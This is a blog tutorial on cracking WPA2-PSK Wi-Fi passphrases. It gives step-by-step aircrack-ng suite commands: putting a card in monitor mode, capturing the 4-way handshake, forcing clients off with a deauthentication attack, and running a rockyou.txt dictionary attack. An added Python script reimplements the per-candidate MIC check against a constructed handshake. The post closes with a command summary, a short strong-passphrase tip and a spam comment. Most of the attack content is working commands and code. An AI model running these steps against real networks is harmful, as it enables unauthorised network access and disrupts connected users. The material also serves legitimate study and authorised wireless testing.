Saturday, April 23, 2016

Cracking WPA2 Personal (PSK) Wireless Networks

Boot up your Kali Linux box, open a terminal and run airmon-ng to list the wireless interfaces and check that your card is recognised and up.

My wireless interface is called wlan0. Put it into monitor mode by entering airmon-ng start wlan0. If airmon-ng warns about processes that could interfere (typically NetworkManager and wpa_supplicant), stop them first, otherwise they may pull the card back out of monitor mode or change its channel while you are capturing.

Now run airmon-ng again to see the interface's new name, which is what we will use from here on: "wlan0mon", as you can see in the following capture.

Now let's see which Wi-Fi networks are in range by entering the command airodump-ng wlan0mon

Let it run for about a minute to gather information. In the capture you can see that only one wireless network is in range; it is on channel 1 (the CH column) and uses WPA2 with PSK (Pre-Shared Key) authentication (the ENC and AUTH columns). This is the most common type of security on wireless networks today.

Let's now capture packets from just that network, the BSSID 90:61:0C:27:5D:CB on channel 1, and write them to files with the prefix "HOMECAP".
The command is airodump-ng -w HOMECAP -c 1 --bssid 90:61:0C:27:5D:CB wlan0mon
"-c 1" locks the card to channel 1; if the network is on channel 10, use "-c 10". Locking the channel matters: without -c, airodump-ng hops across channels and will miss handshake frames sent while it is listening on another one.

Let it run until it captures a handshake. When it has, airodump-ng shows "WPA handshake: <BSSID>" in the top right of its display, as in the following capture.

You must wait for a handshake. Capturing one from an active network is not that hard, because clients reconnect regularly: computers go to sleep, get turned off and rebooted, and so on, and every reconnection produces a fresh 4-way handshake. You can also force connected clients to re-authenticate by running
aireplay-ng -0 0 -a <BSSID> -c <Client MAC Address> wlan0mon
in a separate terminal while airodump-ng keeps capturing. "-0" selects the deauthentication attack and the number after it is how many deauthentication bursts to send (0 means keep sending until you stop it). It does not always work in practice: the card and driver must support packet injection, the card must be on the network's channel, and a client that has negotiated protected management frames (802.11w) with the access point will ignore forged deauthentication frames.

After a handshake has been captured, enter ls to see the actual name of the file that was written.

See, even though we gave the name HOMECAP, airodump-ng numbered it and wrote HOMECAP-01.cap (it also writes .csv files with the same prefix alongside it; a second run with the same prefix produces HOMECAP-02.cap).

Now let's crack it using a wordlist. Here I am using Kali's built-in rockyou.txt list, which is about 140 MB uncompressed. If you are using it for the first time you first have to decompress it: it ships as the gzip file /usr/share/wordlists/rockyou.txt.gz, not a tar archive. It contains most of the common passwords people normally choose for their wireless networks. There are also much larger wordlists out there, gigabytes in size, but no list covers every possible passphrase: a dictionary attack only recovers a passphrase that appears in the list.
Enter aircrack-ng HOMECAP-01.cap -w /usr/share/wordlists/rockyou.txt
Let it run until it cracks the password. For every word in the list aircrack-ng derives the WPA2 key from the word and the SSID and checks it against the MIC in the captured handshake, so the time it takes depends on the processing power of your CPU and on how far down the list the password is (a password that is not in the list is never found). For this password it took only about 5 minutes.
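To make clear what aircrack-ng is actually doing in that last step, here is the same check written out in Python. This is an added example, not code from the post or from the aircrack-ng project: it derives the PMK from a candidate passphrase and the SSID (PBKDF2-HMAC-SHA1, 4096 iterations), expands it to the PTK with the two MAC addresses and the two nonces, and compares the resulting MIC with the one in EAPOL message 2. The handshake it checks is constructed inside the script (made-up SSID, locally administered MAC addresses, nonces derived from fixed strings, and a passphrase deliberately placed in a tiny wordlist), so it runs offline; the helper and variable names are mine and the EAPOL frame layout follows IEEE 802.11i.

```python
"""Worked WPA2-PSK dictionary check: what aircrack-ng computes per wordlist entry.
All inputs are constructed locally; nothing here is a real capture."""
import hashlib
import hmac
import struct
from dataclasses import dataclass


def wpa2_pmk(passphrase: str, ssid: str) -> bytes:
    """Pairwise Master Key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ieee80211_prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11i PRF: concatenate HMAC-SHA1(key, label || 0x00 || data || i), truncate."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def wpa2_ptk(pmk: bytes, ap_mac: bytes, client_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """Pairwise Transient Key (48 bytes for CCMP): KCK(16) | KEK(16) | TK(16)."""
    data = (min(ap_mac, client_mac) + max(ap_mac, client_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return ieee80211_prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, eapol_with_zero_mic: bytes) -> bytes:
    """Key MIC for WPA2/CCMP (key descriptor version 2): HMAC-SHA1 truncated to 16 bytes."""
    return hmac.new(kck, eapol_with_zero_mic, hashlib.sha1).digest()[:16]


# EAPOL hdr(4) + desc type(1) + key info(2) + key len(2) + replay(8) + nonce(32)
# + key IV(16) + RSC(8) + key ID(8) = 81 bytes before the 16-byte MIC field.
MIC_OFFSET = 81


@dataclass
class Handshake:
    ssid: str
    ap_mac: bytes
    client_mac: bytes
    anonce: bytes       # from message 1 (AP -> client)
    snonce: bytes       # from message 2 (client -> AP)
    eapol_msg2: bytes   # message 2 as captured, MIC field included


def check_passphrase(hs: Handshake, passphrase: str) -> bool:
    """The per-candidate test: derive KCK, recompute the MIC, compare with the capture."""
    pmk = wpa2_pmk(passphrase, hs.ssid)
    kck = wpa2_ptk(pmk, hs.ap_mac, hs.client_mac, hs.anonce, hs.snonce)[:16]
    captured_mic = hs.eapol_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = hs.eapol_msg2[:MIC_OFFSET] + bytes(16) + hs.eapol_msg2[MIC_OFFSET + 16:]
    return hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic)


def crack(hs: Handshake, wordlist):
    """Return the first candidate whose MIC matches, or None if the list is exhausted."""
    for candidate in wordlist:
        if check_passphrase(hs, candidate):
            return candidate
    return None


def build_eapol_msg2(snonce: bytes, kck: bytes) -> bytes:
    """Construct an EAPOL-Key message 2 (client -> AP) and fill in its real MIC."""
    rsn_ie = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # WPA2-PSK/CCMP
    body = (b"\x02"                           # descriptor type: RSN key
            + struct.pack(">H", 0x010a)       # key info: version 2 (HMAC-SHA1), pairwise, MIC set
            + struct.pack(">H", 0)            # key length (0 in message 2)
            + struct.pack(">Q", 1)            # replay counter
            + snonce + bytes(16) + bytes(8) + bytes(8)   # nonce, key IV, RSC, key ID
            + bytes(16)                       # MIC, zero while the MIC is computed
            + struct.pack(">H", len(rsn_ie)) + rsn_ie)
    frame = b"\x02\x03" + struct.pack(">H", len(body)) + body   # EAPOL v2, type 3 = Key
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def make_sample_handshake() -> Handshake:
    """Constructed handshake (made-up SSID, MACs and nonces) for the passphrase 'sunshine1'."""
    ssid, secret = "HomeNet", "sunshine1"
    ap_mac = bytes.fromhex("020000000001")       # locally administered, made up
    client_mac = bytes.fromhex("020000000002")
    anonce = hashlib.sha256(b"anonce").digest()  # any 32 bytes will do for the demo
    snonce = hashlib.sha256(b"snonce").digest()
    kck = wpa2_ptk(wpa2_pmk(secret, ssid), ap_mac, client_mac, anonce, snonce)[:16]
    return Handshake(ssid, ap_mac, client_mac, anonce, snonce, build_eapol_msg2(snonce, kck))


def demo():
    wordlist = ["password", "123456", "iloveyou", "sunshine1", "qwerty"]  # stands in for rockyou.txt
    return crack(make_sample_handshake(), wordlist)


if __name__ == "__main__":
    print("recovered passphrase:", demo())
```

Two things worth noticing in the loop: the only per-candidate cost that matters is the 4096-round PBKDF2, which is why cracking speed is measured in keys per second and scales with CPU (or GPU) power, and nothing about the captured frames leaks the passphrase itself; a passphrase absent from the list simply never matches.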

Since anyone within radio range can capture the handshake, the only defence on a WPA2 PSK network is a passphrase that will not appear in any wordlist: long, random and not built from dictionary words or personal details.

Commands used:

airmon-ng start <physical interface>
airodump-ng <new monitoring interface>
airodump-ng -w <file name> -c <channel number> --bssid <BSSID> <new monitoring interface>
aircrack-ng <capture file name> -w /usr/share/wordlists/rockyou.txt


  • September 7, 2017 at 11:22 PM
    Anonymous says:

    This is really interesting. You are a very skilled blogger.
    I've joined your feed and look forward to seeking more of your great posts.
    Also, I have shared your site on my social networks!
